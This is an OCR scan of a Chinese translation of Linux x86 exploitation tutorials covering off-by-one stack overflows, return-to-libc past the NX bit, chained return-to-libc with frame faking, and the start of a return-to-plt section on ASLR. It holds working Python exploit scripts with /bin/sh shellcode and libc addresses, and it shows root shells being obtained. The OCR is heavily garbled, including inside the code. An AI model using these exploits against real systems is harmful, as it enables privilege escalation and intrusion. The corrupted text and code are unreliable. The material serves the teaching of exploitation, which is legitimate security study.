标 缓冲 区 buf 中 的 返回 地 址 位 于 Oxbffff204 。 因 此 ， 从 buf 到 返回 地 址 的 偏 
移 量 为 Oxbffff204 - Oxbffffi158 = Oxac 。 因 此 ， 用 户 输入 的 形 

AX "A"* 172 +"B"* 4 +"A"* 80 ， 用 BBBB AX %EIP 。 


$ cat exp tst.py 
#exp_tst.py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


D 
bur += "BY * 4 
buf += "A" * 80 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


$ python exp tst.py 

Calling vulnerable program 

$ sudo gdb -q vuln 

Reading symbols from /home/sploitfun/lsploits/new/obo/stack/vuln 
...(no debugging symbols found)...done. 

(gdb) core-file core 

[New LWP 4055] 

warning: Can't read pathname for load map: Input/output error. 
Core was generated by ~./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' . 

Program terminated with signal 11, Segmentation fault. 

#0 0x42424242 in ?? () 

(gdb) p/x $eip 

$1 = 0x42424242 

(gdb) 


以 上 输出 显示 攻击 者 可 以 控制 返回 地 址 。 返 回 地 址 位 于 buf 的 偏 移 量 ( gxac ) 
处 。 有 了 这 些 信息 ， 我 们 可 以 编写 一 个 漏洞 利用 程序 来 实现 任意 的 代码 执行 。 


利用 代码 : 


#exp. py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


#Spawn a shell. 

#execve(/bin/sh) Size- 28 bytes. 

scode = "\x31\xcO0\x50\x68\x2f\x2f\x73\x68\xX68\x2f\x62\x69\x6e\x8 
9\xe3\x50\x89\xe2\x53\x89\xe1\xbO\xOb\xcd\x80\x90\x90\x90" 


ret_addr = Oxbffff218 


#endianess conversion 
def conv(num): 
return struct.pack("«I",numturn Address + NOP's + Shellcode + J 
unk 
buf = "A" * 172 
buf += conv(ret addr) 
buf += "Xx90" * 30 
buf += scode 
buf += "A" * 29 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 面 的 exploit 程 序 给 我 们 root shell > 4e FATA : 


$ python exp.py 

Calling vulnerable program 

4 id 

uid-1000(sploitfun) gid-1000(sploitfun) euid-O(root) egid=0(root 
) groups=0(root),4(adm), 24(cdrom), 27(sudo), 30(dip),46(plugdev),1 
09(lpadmin),124(sambashare),1000(sploitfun) 

# exit 

$ 


off by ones e 3k 4$. — 4 & d& bug * CA FEN EFT CARA iS Xx A LOB 
误 可 能 会 导致 任意 代码 执行 。off by one 总 是 导致 任意 代码 执行 吗 ? 


如 果 调 用 者 的 EBP 不 存在 于 目的 地 缓冲 区 之 上 怎么 办 ? 


这 个 问题 的 答案 很 简单 ， 我 们 不 能 用 EBP 覆 写 技术 来 利用 它 ! (但 是 一 些 其 他 的 利用 
技术 可 能 是 可 能 的 ， 因 为 代码 中 存在 一 个 bug ) 


在 什么 情况 下 ， 调 用 者 的 EBP 不 会 出 现在 目标 缓冲 区 上 方 ? 
情况 1 : 目标 缓冲 区 之 上 可 能 存在 其 他 局 部 变量 。 


void bar(char* arg) { 
ine c 10.7 pi]. 
charsburp2561; 27.12]. 7 
strepy( but, arg) 7 [3] 77 


因此 ， 在 这 些 情况 下 ， 在 缓冲 区 buf 和 EBP 的 结尾 之 间 找 到 了 一 个 局 部 变量 ， 它 
不 允许 我 们 履 盖 EBP 的 LSB ! 


情况 2 : 对 齐 空间 - 默认 情况 下 ，gcc 将 堆栈 空间 对 齐 为 16 字 节 边 界 ， 即 在 创建 堆栈 
空间 之 前 ) ESP 的 最 后 4 位 是 0 并 且 使 用 and 指令 ， 如 下 面 的 函数 反 汇 编 所 示 。 


Dump of assembler code for function main: 
0x08048497 <+0>: push %ebp 

0x08048498 <+1>: mov %esp,%ebp 
0x0804849a <+3>: push %edi 


0x0804849b <+4>: and $0xfffffffO,9cesp //Stack spa 
ce aligned to 16 byte boundary 

0x0804849e <+7>: sub $0x20,%esp //create st 
ack space 


因此 ， 在 这 些 情况 下 ， 在 缓冲 区 buf 和 EBP 的 结尾 之 间 找 到 一 个 对 齐 空间 (最 多 
12 个 字 节 ) ， 这 不 允许 我 们 禾 盖 EBP 的 LSB ! 


因为 这 个 原因 ， 我 们 在 编译 我 们 漏洞 代码 (vuln.c) 时 添加 了 gcc 参 
数 -mpreferred-stack-boundary = 2 ! 


请 求 帮助 此 如 果 在 创建 堆栈 空间 之 前 ，ESP 已 经 在 16 字 节 边 界 层 上 对 齐 了 ?在 这 种 
情况 下 ， 即 使 程序 使 用 gcc 的 16 字 节 的 黑 认 堆栈 边界 进行 编译 ，EBP 履 写 也 是 可 行 

的 。 但 到 目前 为 止 ， 我 没有 创建 这 样 一 个 工作 代码 。 在 我 创建 堆栈 空间 之 前 的 所 有 
尝试 中 ，ESP 在 16 字 节 边 界 上 不 对 齐 ， 无 论 如 何 谨 懂 地 创建 我 的 堆栈 内 容 ，gcc 为 

本 地 变量 添加 了 一 些 额外 的 空间 ， 这 使 得 ESP 对 齐 不 到 16 字 节 边 界 。 如 果 任 何人 有 
工作 代码 或 有 一 个 答案 :为 什么 ESP 总 是 不 对 齐 ， 请 让 我 知道 。 


参考 
http://seclists.org/bugtraq/1998/Oct/109 


使 用 return-to-libc Z&3ii NX 位 


译 者 : hackyzh 

原文 : Bypassing NX bit using return-to-libc 
前 提 条 件 : 
经 典 的 基于 堆栈 的 缓冲 区 溢出 
虚拟 机 安装 : Ubuntu 12.04 (x86) 
在 以 前 的 帖子 中 ， 我 们 看 到 了 这 个 攻击 者 

e 复制 shellcode 堆 栈 并 跳 转 到 它 ! 


为 了 成 功利 用 漏洞 代码 。 为 了 阻止 攻击 者 的 行动 ， 安 全 研究 人 员 提 出 了 一 个 名 
为 “NX 位 ”的 漏洞 缓解 ! 


什么 是 NX 位 ? 


它 是 一 种 利用 绥 解 技术 ， 使 某 些 内 存 区 域 不 可 执行 ， 并 使 可 执行 区 域 不 可 写 。 示 
B : 使 数据 ， 堆 栈 和 堆 段 不 可 执行 ， 而 代码 段 不 可 写 。 


在 NX 位 打开 的 情况 下 ， 我 们 基于 堆栈 的 缓冲 区 溢出 的 经 典 方法 将 无 法 利用 此 漏 
洞 。 因 为 在 经 典 的 方法 中 ，shellcode 被 复制 到 堆栈 中 ， 和 返回 地 址 指向 Shellcode > 
但 是 现在 由 于 堆栈 不 再 可 执行 ， 我 们 的 漏洞 利用 失败 | 但 是 这 种 缓解 技术 并 不 完全 
是 万 无 一 失 的 ， 因 此 在 这 篇 文章 中 我 们 可 以 看 到 如 何 绕 过 NX 位 1 


漏洞 代码 : 此 代码 与 以 前 发 布 的 漏洞 代码 相同 ， 稍 作 修改 。 稍 后 我 会 谈 谈 需 要 修改 
的 内 容 。 


NAL a C 
#include <stdio.h> 
#include <string.h> 


int main(int argc, char^ argv| |) 1 
char buf[256]; /* [1] */ 
strepy(buft, argyll 7*- 12177 
printf EN sn" but 2181 57 
trlusnostdout); —7* [4] 7 
rete mao 


j 


编译 命令 : 


#echo 0 > /proc/sys/kernel/randomize va space 
$gcc -g -fno-stack-protector -o vuln vuln.c 
$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +s vuln 


注意 : -z execstack 参数 不 传递 给 gcc， 因 此 现在 堆栈 是 非 可 执行 的 ， 可 以 验证 
如 下 所 示 : 


$ readelf -1 vuln 


Program Headers: 


Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Al 
ign 

PHDR 0x000034 0x08048034 0x08048034 0x00120 0x00120 R E Ox 
4 


INTERP 0x000154 0x08048154 0x08048154 0x00013 0x00013 R Ox1 
[Requesting program interpreter: /lib/ld-linux.so.2] 


LOAD 0x000000 0x08048000 0x08048000 0x00678 0x00678 R E Ox 
1000 

LOAD 0x000f14 0x08049f14 Ox08049f14 0x00108 0x00118 RW 0x1 
000 

DYNAMIC 0x000f28 0x08049f28 0x08049f28 0x000c8 0x000c8 RW 0x4 

NOTE 0x000168 0x08048168 0x08048168 0x00044 0x00044 R Ox4 


GNU STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 
GNU RELRO 0x000f14 0x08049f14 0x08049f14 O0x000ec 0Ox000ec R 0x1 
$ 


堆栈 段 只 包含 RW 标志 ， 无 E 标志 |! 
如 何 绕 过 NX 位 并 实现 任意 代码 执行 ? 


可 以 使 用 叫做 “return-to-libc” 的 攻击 技术 绕 过 NX 位。 这 里 返回 地 址 被 一 个 特定 的 
libc Zt HOSEA á (而 不 是 包含 shellcode 的 堆栈 地 址 ) 。 例 如 ， 如 果 攻 击 者 想 要 生 
成 一 个 shell， 那 么 他 将 使 用 system 地 址 覆盖 返回 地 址 ， 并 在 堆栈 中 设 

A system 所 需 的 相应 参数 ， 以 便 成 功 调 用 它 。 


在 已 经 反 汇编 并 绘制 了 漏洞 代码 的 堆栈 布局 后 ， 让 我 们 编写 一 个 漏洞 代码 来 绕 过 NX 


位 | 


利用 代码 : 


使 用 return-to-libc Z&3t NX bit 


#exp . py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


#Since ALSR is disabled, libc base address would remain constant 
and hence we can easily find the function address we want by ad 
ding the offset to it. 
#For example system address = libc base address + system offset 
#where 
#libc base address = 0xb7e22000 (Constant address, it can 
also be obtained from cat /proc//maps) 
#system offset - 0x0003f060 (obtained from "readelf - 
s /lib/i386-linux-gnu/libc.so.6 | grep system") 


system = 0xb7e61060 #0xb7e2000+0x0003f060 
exit = 0xb7e54be0 #0xb7e€2000+0x00032be0 


#system_arg points to 'sh' substring of 'fflush' string. 

#TO Spawn a shell, system argument should be 'sh' and hence this 
is the reason for adding line [4] in vuln.c. 

#But incase there is no 'sh' in vulnerable binary, we can take t 
he other approach of pushing 'sh' string at the end of user inpu 
el 

system_arg = 0x804827d #(obtained from hexdump output of the 
binary) 


#endianess conversion 
def conv(num): 
return struct.pack("«I",numystem + exit + system arg 
buf = "A" * 268 
buf += conv(system) 
buf += conv(exit) 
buf += conv(system arg) 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 面 的 exploit 程 序 给 我 们 root shell > w FATA : 


$ python exp.py 

Calling vulnerable program 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAA  666K66 6 

4 id 

uid=1000(sploitfun) gid-1000(sploitfun) euid=0(root) egid=0(root 
) groups=0(root),4(adm), 24(cdrom),27(sudo), 30(dip), 46(plugdev),1 
09(lpadmin), 124(sambashare),1000(sploitfun) 

# exit 

$ 


宾 果 ， 我 们 得 到 了 root shell ! 但 是 在 实际 应 用 中 ， 由 于 root setuid 程 序 会 采用 最 小 
权限 的 原则 ， 它 并 不 容易 。 


什么 是 最 小 权限 原则 ? 


此 技术 允许 root setuid 程 序 仅 在 需要 时 获取 root 权 限 。 这 指 的 是 当 需 要 时 ， 获 得 root 
权限 ， 当 不 需要 它们 时 ， 它 将 丢弃 获得 的 root 权 限 。 正 常 做 法 是 root setuid 程 序 之 
后 ， 用 户 获取 输入 之 前 删除 root 权 限 。 因 此 ， 即 使 用 户 输入 是 恶意 的 ， 攻 击 者 也 不 
会 得 到 root shell。 倒 如 下 面 的 漏洞 代码 不 允许 攻击 者 获取 root shell 。 


漏洞 代码 : 


EIERE 


#include <stdio.h> 
#include <string.h> 


int main(int argc, char* argv[]) £ 

char buf[256]; 

seteuid(getuid()); /* Temporarily drop privileges */ 
strcpy(buf,argv[1]); 

printf("%s\n", buf); 

fflush(stdout); 

return 0; 


25 4x41] RAS RIT ON AMA A AUR RAA EN > VALLE ZR] 85 4X8 85 2-25 root 
shell ¢ 


#exp_priv.py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


system = 0xb7e61060 
exit = Oxb7e54be® 


system_arg = 0x804829d 


#endianess conversion 
def conv(num): 
return struct.pack("<I",numystem + exit + system arg 
buf = "A" * 268 
buf += conv(system) 
buf += conv(exit) 
buf += conv(system_arg) 


print "Calling vulnerable program" 
call(["./vuln_priv", but] ) 


注意 : exp priv.py 是 exp.py 的 略微 修改 的 版 本 ! 只 是 system arg 变量 被 
调整 了 


$ python exp. priv.py 

Calling vulnerable program 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAA (66K! È 

$ id 

uid-1000(sploitfun) gid-1000(sploitfun) egid-O(root) groups=1000 
(sploitfun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(1lp 
admin),124(sambashare) 

$ rm /bin/ls 

rm: remove write-protected regular file "/bin/ls'? y 

rm: cannot remove "/bin/ls': Permission denied 

$ exit 

$ 


这 是 隧道 的 尽头 吗 ? 如 何 利 用 应 用 最 小 权限 原则 的 root setuid 程 序 ? 


对 于 漏洞 代码 ( vuln priv ) ， 我 们 的 利用 代码 ( exp priv.py ) 正在 调 
用 system ， 随 后 退出 ， 发 现 它 不 足以 获取 root shell。 但 是 如 果 我 们 的 利用 代码 
( exp priv.py ) 被 修改 为 调用 以 下 libc 函 数 (按照 列 出 的 顺序 ) 


e seteuid(0) 


e system("sh") 
e exit() 


我 们 将 获得 root shell。 这 种 技术 被 称 为 链接 到 libc ! 


使 用 链 式 return-to-libc 绕 过 NX 位 


译 者 : hackyzh 
原文 : Bypassing NX bit using chained return-to-libc 
前 提 条 件 : 
e 经 典 的 基于 堆栈 的 缓冲 区 溢出 
e 使 用 return-to-libc 绕 过 NX 位 
虚拟 机 安装 : Ubuntu 12.04 (x86) 
链接 的 returned-to-libc? 
正如 以 前 的 帖子 看 到 的 ， 有 需要 攻击 者 为 了 成 功利 用 需要 调用 多 个 libc 函 数 。 链 接 
多 个 libc 函 数 的 一 种 简单 方法 是 在 挫 栈 中 放置 一 个 libc 函 数 地 址 ， 但 是 由 于 肠 数 参数 
的 原因 ， 所 以 是 不 可 能 的 。 讲 的 不 是 很 清楚 ， 但 是 没有 问题 ， 继 续 | 
漏洞 代码 : 


TL AULUS C 
include <stdio.h> 
#include <string.h> 


ne main(int rg char argv | It 

char buf[256]; 

seteuid(getuid()); /* Temporarily drop privileges */ 
strcpy(buf,argv[1]); 

printf("%s", buf); 

fflush(stdout); 

LOEUGH OG: 


注意 : 此 代码 与 上 一 篇 文章 ( vuln priv.c ) 中 列 出 的 漏洞 代码 相同 。 


编译 命令 : 


Zecho 0 > /proc/sys/kernel/randomize va space 
$gcc -fno-stack-protector -g -o vuln vuln.c 
$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +s vuln 


如 前 一 篇 文章 所 述 ， 链 接 setuid > system 和 exit 将 允许 我 们 能 够 利用 漏洞 
代码 vuln 。 但 由 于 以 下 两 个 问题 ， 不 是 一 个 直接 的 任务 : 


使 用 链 式 return-to-libc Z&3t NX bit 


1^ ER P IE] Së, cod d E RACE libe h c 84 zs CA dc 30 — Nibe BA 
HRA Fe HA — ^ Mibo HAH ModE > 3x XOARGECRCT AM (Ae FE) 。 


2^ seteuid arg 应 为 零 。 但 是 由 于 我 们 的 缓冲 区 溢出 是 由 于 strcpy 引起 的 ， 
所 以 零 变 成 一 个 坏 的 字符 ，ie) 这 个 零 之 后 的 字符 不 会 被 stropy 复制 到 堆栈 
中 o 


| 4—— — argv 
7] 4—— —— argc 


Oxbffffifc -————— Return Address 


Oxbffffif8 «— ——— EBP 


| «4————— Alignment Space 


OxbffffOfO 
e Problem 1: When 
attacker overflows the 
buffer in place of ‘argv’ 
he can either place 
Sseteuid arg or 
exit addr but NOT 
main() Stack Layout both!! 





Oxbffff0e0 


现在 看 看 如 何 克 服 这 两 个 问题 。 

问题 1 : 为 了 解决 这 个 问题 ，Nergal 谈 到 了 两 项 辉煌 的 技术 
1 ^ ESP Lifting 

2^ Frame Faking 


在 他 的 pharck 杂 志 的 文章 中 。 这 里 让 我 们 只 看 关于 帧 伪造 ， 因 为 应 用 esp lifting R 
二 进 制 应 该 在 没有 帧 指针 下 支持 下 进行 编译 ( -fomit-frame-pointer ) 。 但 是 
由 于 我 们 的 二 进 制 ( vuln ) 包含 帧 指针 ， 我 们 需要 应 用 帧 伪造 技术 。 


帧 伪造 ?了 


在 这 种 技术 中 ， 而 不 是 使 用 libc 函 数 地 址 (本 例 中 为 seteuid ) 直接 覆盖 返回 地 

址 ， 我 们 用 leave ret 指令 来 覆盖 它 。 这 人 允许 攻击 者 将 堆栈 中 的 函数 参数 存储 起 
来 ， 而 不 会 有 任何 重 司 ， 从 而 允许 调用 相应 的 libc 骂 数 ， 而 不 会 有 任何 问题 。 让 我 

们 来 看 看 会 怎么 样 ? 


堆栈 布局 : 当 攻 击 者 伪造 帧 进行 缓冲 区 溢出 时 ， 如 下 图 堆栈 布局 所 示 ， 成 功 链接 
libc:& 4 seteuid , system 和 exit : 
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使 用 链 式 return-to-libc Z&3t NX bit 


Oxbffff230 

Oxbffff22c 

Oxbffff228 

Oxbffff224 

Oxbffff220 

Oxbffff21c 

Oxbffff218 

Oxbffff214 

Oxbffff210 

Oxbffff20c 

Oxbffff208 

Oxbffff204 «— — argv 

Oxbffff200 «— —— arge 

Oxbffffifc + Return Address 

Oxbffff1f8 -—— —— EBP 
-«————— Alignment Space 
-4——— buf ends here 

OxbffffOfO + buf starts here 

OxbffffOe0 <+—— ESP 





main() Stack Layout - Chained 
with multiple libc functions 


上 图 中 的 红色 突出 显示 是 返回 地 址 ， 其 中 每 个 leave ret 4843874 X EZ: VlibcH 
数 。 例 如 ， 第 一 个 leave ret 指令 〈 位 于 堆栈 地 址 9xbffff1fc ) 调 

用 seteuid() ， 而 第 二 个 leave ret (位 于 堆栈 地 址 Oxbffff20c ) 调 

用 system() ,第 三 个 leave ret 指令 (位 于 堆栈 地 址 9xbffff21c ) 调 

用 exit() 。 


leave ret 指令 如 何 调用 上 面 的 libc 函 数 ? 
要 知道 上 述 问 题 的 答案 ， 首 先 我 们 需要 了 解 leave 指令 ， leave 指令 转换 为 : 
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mov ebp,esp //esp - ebp 
pop ebp //ebp - 


b 
c 


让 我 们 反 汇 编 main() 有 函数 来 了 解 更 多 关于 leave ret 指令 的 信 


(gdb) disassemble main 

Dump of assembler code for function main: 
0x0804851c <+88>: leave //mov ebp, esp; pop e 

bp; 

0x0804851d <+89>: ret 

End of assembler dump. 


(gdb) 


//return 


main 结尾 : 


在 main 的 结尾 执行 之 前 ， 如 上 面 的 堆栈 布局 所 示 ， 攻 击 者 将 会 溢出 缓冲 区 并 且 将 
会 覆盖 ， main 的 ebp 是 fake ebpo ( oxbffff204 ) 并 且 返回 地 址 

是 leave ret 指令 地 址 ( 0x0804851c ) 。 现 在 当 CPU 即 将 执行 main 的 结尾 
时 ，EIP 指 向 文本 地 址 0x0804851c ( leave ret ) 。 执 行 时 ， 发 生 以 下 情况 : 


e leave 改变 下 面 的 寄存 器 
o esp = ebp = Oxbffffif8 


o ebp = Oxbffff204, esp = Oxbffffifc 
ret 执行 leave ret 指令 (位 于 栈 地 址 Oxbffffifc ) 


seteuid :现在 EIP 再 次 指向 代码 地 址 0x0804851c ( leave ret ) 。 执 行 
中 ， 发 生 以 下 情况 : 
e leave 改变 下 面 寄存 器 
o esp = ebp = Oxbffff204 
o ebp = Oxbffff214, esp -Oxbffff208 
e ret 执行 seteuid() (位 于 堆栈 地 址 9xbffff208 ) .为 了 成 功 调 
用 seteuid , seteuid arg 应 该 被 放 在 从 seteuid addr 起 的 8 字 节 处 ， 在 


堆栈 位 置 Oxbffff210 
e 在 seteuid() 调用 后 ，leave ret 指令 (位 于 堆栈 地 址 Oxbffff20c ) 执 


行 
e 按照 上 述 过 程 ，system 和 exit 也 将 被 调用 ， 因 为 堆栈 被 设置 为 由 攻击 者 


调用 -如 上 面 的 堆栈 布局 图 所 示 
问题 2 : 在 我 们 的 情况 下 ， seteuid arg 应 为 零 。 但 是 由 于 零 是 一 个 坏 字 符 ， 如 
何在 堆栈 地 址 oxbffff210 写 零 ?有 一 个 简单 的 解决 方案 ， 它 在 同一 篇 文章 中 由 
nergal 讨 论 。 在 链接 libc 函 数 时 ， 前 几 个 调用 应 该 是 strcpy ， 它 将 NULL 字 节 复 
制 到 seteuid arg 的 堆栈 位 置 。 


注意 : 不 幸 的 是 在 我 的 libc.so.6 中 strcpy 的 函数 地 址 是 Oxb7rea6200 ，libc 
函数 地 址 本 身 包 含 一 个 NULL FR (GRAM) 。 因 此 ， stropy 不 能 用 于 漏洞 代 
码 。 sprintf 《其 函数 地 址 为 9xb7e6e8d9 ) 用 作 stropy HER > 1% 

用 sprintf 将 NULL 字 节 复制 到 seteuid arg 的 堆栈 位 置 。 


因此 ， 以 下 libc 元 数 被 链接 来 解决 上 述 两 个 问题 并 成 功 获 取 root shell : 


sprintf | sprintf | sprintf | sprintf | seteuid | system | exit 


利用 代码 : 


#exp . py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


fake ebpO = 0xbffff1a0 
fake_ebp1 = Oxbffff1b8 
fake ebp2 = Oxbffff1de 
fake ebp3 - Oxbffff1e8 
fake ebp4 - Oxbffff204 
fake ebp5 = Oxbffff214 
fake ebp6 - Oxbffff224 
fake ebp7 = Oxbffff234 
leave ret = 0x0804851c 


sprintf addr = Oxb7e6e8d® 
seteuid addr - 0xb7f09720 
system addr - 0xb7e61060 
exit addr = Oxb7e54be0 
sprintf arg1 Oxbffff210 
sprintf arg2 0x80485f0 
sprintf arg3 - Oxbffff23c 
system arg = 0x804829d 
exit arg - Oxffffffff 


#endianess convertion 
def conv(num): 
return struct.pack("«I",num* 264 
buf += conv(fake_ebp®) 
buf += conv(leave_ret) 
#Below four stack frames are for sprintf (to setup seteuid arg ) 
buf += conv(fake_ebp1) 
buf += conv(sprintf_addr ) 
buf += conv(leave_ret) 
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp2) 
buf += conv(sprintf_addr ) 
buf += conv(leave_ret) 


sprintf argi += 1 

buf += conv(sprintf_arg1) 

buf += conv(sprintf_arg2) 

buf += conv(sprintf_arg3) 

buf += conv(fake_ebp3) 

buf += conv(sprintf_addr ) 

buf += conv(leave_ret) 

sprintf argi += 1 

buf += conv(sprintf_arg1) 

buf += conv(sprintf_arg2) 

buf += conv(sprintf_arg3) 

buf += conv(fake_ebp4) 

buf += conv(sprintf_addr ) 

buf += conv(leave_ret) 

sprintf argi += 1 

buf += conv(sprintf_arg1) 

buf += conv(sprintf_arg2) 

buf += conv(sprintf_arg3) 

#Dummy - To avoid null byte in fake_ebp4. 
buf += n» * A 

#Below stack frame is for seteuid 
buf += conv(fake ebp5) 

buf += conv(seteuid addr) 

buf += conv(leave ret) 

#Dummy - This arg is zero'd by above four sprintf calls 
buf 十 三 NAN * 4 

#Below stack frame is for system 
buf += conv(fake_ebp6) 

buf += conv(system_addr) 

buf += conv(leave_ret) 

buf += conv(system_arg) 

#Below stack frame is for exit 
buf += conv(fake_ebp7) 

buf += conv(exit_addr) 

buf += conv(leave_ret) 

buf += conv(exit_arg) 


print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 述 漏洞 代码 给 我 们 root shell ! 


$ python exp.py 

Calling vulnerable program 
AAAAAAAAG6666666660060660600 \ 6600600660000 066N O0000000000000\ O0000000 
666006606 6660000A^A^0666066665 

# id 

uid-1000(sploitfun) gid-1000(sploitfun) euid-O(root) egid=0(root 
) groups=0(root),4(adm), 24(cdrom), 27(sudo), 30(dip),46(plugdev),1 
09(lpadmin),124(sambashare),1000(sploitfun) 

# exit 

$ 


现在 完全 绕 过 了 NX 位 ， 让 我 们 看 看 如 何在 下 一 篇 文章 中 绕 过 ASLR © 


绕 过 ASLR -- 第 一 部 分 


译 者 : hackyzh 
原文 : Bypassing ASLR - Part | 
前 提 条 件 : 
经 典 的 基于 堆栈 的 缓冲 区 溢出 
虚拟 机 安装 : Ubuntu 12.04 (x86) 
在 以 前 的 帖子 中 ， 我 们 看 到 了 攻击 者 需要 知道 下 面 两 样 事情 
e 堆栈 地 址 ( 跳 转 到 shellcode ) 
e libc 基 地 址 《成 功 绕 过 NX 位 ) 


为 了 利用 漏洞 代码 。 为 了 阻止 攻击 者 的 行为 ， 安 全 研究 人 员 提出 了 一 个 称 
为 “ASLR” 的 漏洞 利用 。 


什么 是 ASLR? 

地 址 空间 布局 随机 化 (ASLR) 是 随机 化 的 利用 缓解 技术 : 
e 堆栈 地 址 

e uak 

e 共享 库 地 址 


一 旦 上 述 地 址 被 随机 化 ， 特 别 是 当 共 享 库 地 址 被 随机 化 时 ， 我 们 采取 的 绕 过 NX 位 
的 方法 不 会 生效 ， 因 为 攻击 者 需要 知道 libc 基 地 址 。 但 这 种 缓解 技术 并 不 完全 是 万 
无 一 失 的 ， 因 此 在 这 篇 文章 中 我 们 可 以 看 到 如 何 绕 过 共享 库 地 址 随机 化 ! 


我 们 已 经 知道 从 前 一 篇 文章 的 exp.py libc 骂 数 地 址 计算 如 下 : 


libc function address = libc base address + function offset 


XT 


因为 随机 化 被 关闭 ， 所 以 libc 基 址 是 常量 ( 0xb7e22000 - 对 于 我 们 的 vuln —3t 
制 文件 ) 。 


函数 偏 移 也 是 不 变 的 (从 readelf -s libc.so.6 | grep 获得 ) 


现在 当 我 们 打开 完全 随机 化 (使 用 下 面 的 命令 ) 


#echo 2 > /proc/sys/kernel/randomize va space 


libc 基 地 址 将 被 随机 化 。 


注意 : 只 有 libc 基 地 址 是 随机 的 ， 特 定 功能 的 偏 移 与 其 基地 址 始终 保持 不 变 ! 因 
此 ， 如 果 我 们 可 以 绕 过 共享 库 基 地 址 随机 化 ， 即 使 打开 ASLR， 也 可 以 成 功利 用 易 
受 攻击 的 程序 (使 用 三 种 技术 ) © 


e Return-to-plt ( 3x 3€ ) 

e 爆破 (第 二 部 分 ) 

e GOT & Fe Aa] n (第 三 部 分 ) 
什么 是 return-to-plt? 


在 这 种 技术 中 ， 而 不 是 返回 到 |ibc 部 数 (其 地 址 是 随机 的 ) 攻击 者 返回 到 一 个 函数 
的 PLT (其 地 址 不 是 随机 的 -其 地 址 在 执行 之 前 已 知 ) 。 由 于 function@PLT 不 是 
随机 的 ， 所 以 攻击 者 不 再 需要 预测 libc 的 基地 址 ， 而 是 可 以 简单 地 返回 

到 functionQPLT 来 调用 function ° 


什么 是 PLT， 如 何 通 过 调用 function@PLT Žž AA “AA”? 
要 了 解 过 程 链接 表 (PL) ， 先 让 我 简要 介绍 一 下 共享 库 ! 


与 静态 库 不 同 ， 共 享 库 代 码 段 在 多 个 进程 之 间 共 享 ， 而 其 数据 段 对 于 每 个 进程 是 唯 
一 的 。 这 有 助 于 减少 内 存 和 磁盘 空间 。 由 于 代码 段 在 多 个 进程 之 间 共 享 ， 所 以 应 该 
只 有 read 和 execute 权限 ， 因 此 动态 链接 器 不 能 重新 定位 代码 段 中 存在 的 数据 
符号 或 函数 地 址 (因为 它 没有 写 权限 ) 。 那 么 动态 链接 如 何在 运行 时 重新 定位 共享 
库 符 号 而 不 修改 其 代码 段 ? 它 使 用 PIC 完成 ! 


什么 是 PIC ? 


位 置 无 关 代 码 (PIC) 是 为 了 解决 这 个 问题 而 开发 的 - 它 确保 共享 库 代 码 段 在 多 个 
进程 之 间 共 享 ， 尽 管 在 加 载 时 执行 重 定位 。PIC 通 过 一 级 间接 寻 址 实现 这 一 点 -共享 
库 代 码 段 不 包含 绝对 虚拟 地 址 来 代替 全 局 符号 和 函数 引用 ， 而 是 指向 数据 段 中 的 特 
定 表 。 该 表 是 全 局 符号 和 函数 绝对 虚拟 地 址 的 占 位 符 。 动 态 链接 器 作为 重 定位 的 一 
部 分 来 填充 此 表 。 因 此 ， 只 有 重 定位 数据 段 被 修改 ， 代 码 段 保持 不 变 ! 


动态 链接 器 以 两 种 不 同 的 方式 重新 定位 PIC 中 发 现 的 全 局 符号 和 函数 ， 如 下 所 述 : 
全 局 偏 移 表 (GOT) 


全 局 偏 移 表 包 含 每 个 全 局 变量 的 4 字 节 条 目 ， 其 中 4 字 节 条 目 包含 全 局 变量 的 地 址 。 
当代 码 段 中 的 指令 引用 全 局 变量 时 ， 而 不 是 全 局 变量 的 绝对 虚拟 地 址 ， 指 令 指向 
GOT 中 条 目 。 当 加 载 共享 库 时 ，GOT 条 目 由 动态 链接 器 重新 定位 。 因 此 ，PIC 使 用 
该 表 来 重新 定位 具有 单个 间接 级 别 的 全 局 符号 。 


过 程 链接 表 (PLT) : 过 程 链接 表 包 含 每 个 全 局 函数 的 存根 代码 。 代 码 段 中 的 调用 
指令 不 直接 调用 函数 ( function ) ， 而 是 调用 存根 代码 

( function Q PLT ) 。 这 个 存根 代码 在 动态 链接 器 的 帮助 下 解析 了 函数 地 址 并 
将 其 复制 到 GOT ( GOT [n] ) 。 这 次 解析 仅 在 函数 ( function ) 的 第 一 次 调用 
期 间 发 生 ， 稍 后 当代 码 段 中 的 调用 指令 调用 存根 代码 〈 function @PLT ) 时 ， 而 


